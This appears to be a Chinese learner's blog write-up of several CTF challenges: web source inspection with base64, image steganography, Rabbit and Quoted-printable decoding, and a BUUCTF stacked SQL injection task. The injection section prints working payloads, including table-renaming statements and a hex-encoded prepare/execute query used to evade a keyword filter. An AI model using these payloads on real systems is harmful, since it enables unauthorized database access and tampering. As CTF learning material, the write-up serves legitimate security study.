[SWPUCTF 2022 新生赛]numgame

打开环境是一个加不到20的界面

发现右键 F12 ctrl+u均用不了,手动添加 view-source:或从右上角开发者工具打开源代码 src="./js/1.js "  发现有一个前往网页的标签,访问后看到NSSCTF{}就以为是flag

提交,结果不正确

仔细观察才发现这个很像base64编码,于是就直接解码了

这肯定不对,冷静下来才发现{}里的部分才是base64加密

解码后是个php文件 访问后来到第二层

其中的hint2.php文件尝试直接访问,提示类为nss2,继续访问,得到空白页面,刚开始以为没刷新出来,可好一会儿仍是空白

最后尝试查看源代码,发现flag

另外一个世界

下载附件后是一张monster.jpg隐写图片

放入010发现尾部隐写了56个字符01101011011011110110010101101011011010100011001101110011.

变成7个字节,对应ascii为koekj3s,提交flag为flag{koekj3s}

BUUCTF Rabbit

又认识了一种新的加密方式,兔子加密,以后看到固定U2Fs......开头都要留意一下

使用ribbit在线解密工具即可,解密后用flag{}包裹

但要注意有的网址工具同样的方法是不一定解得出来的,要多找找

BUUCTF Quoted-ptintable

另一种新的加密方式 Quoted-ptintable加密

类似十六进制字符(A-F)+十进制数(1-9)再由=连接

使用工具解码得flag(具体前往Quoted-printable在线解码工具-将给定可打印字符引用编码(简称:QP编码)解码为文本

得到解码后以flag{}包裹

[BUUCTF2019]随便注

这题考的是SQL通用语法,输入1 2都有回显,3无,说明有两个字段

 

 

 

尝试联合查询 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);  结果报错,过滤了select|update|delete|drop|insert|where|\./i

那就继续爆数据库1';show databases;#

爆表名1'; show tables;#

有两个表 1'; show columns from words;#

这里学到了表为数字时,要用引号包起来查询。但以我的能力也就只能到这一步,看了大佬的WP以后学了两种方法,一种改表名

1'; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#

另一种通过构造payload得到flag ;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值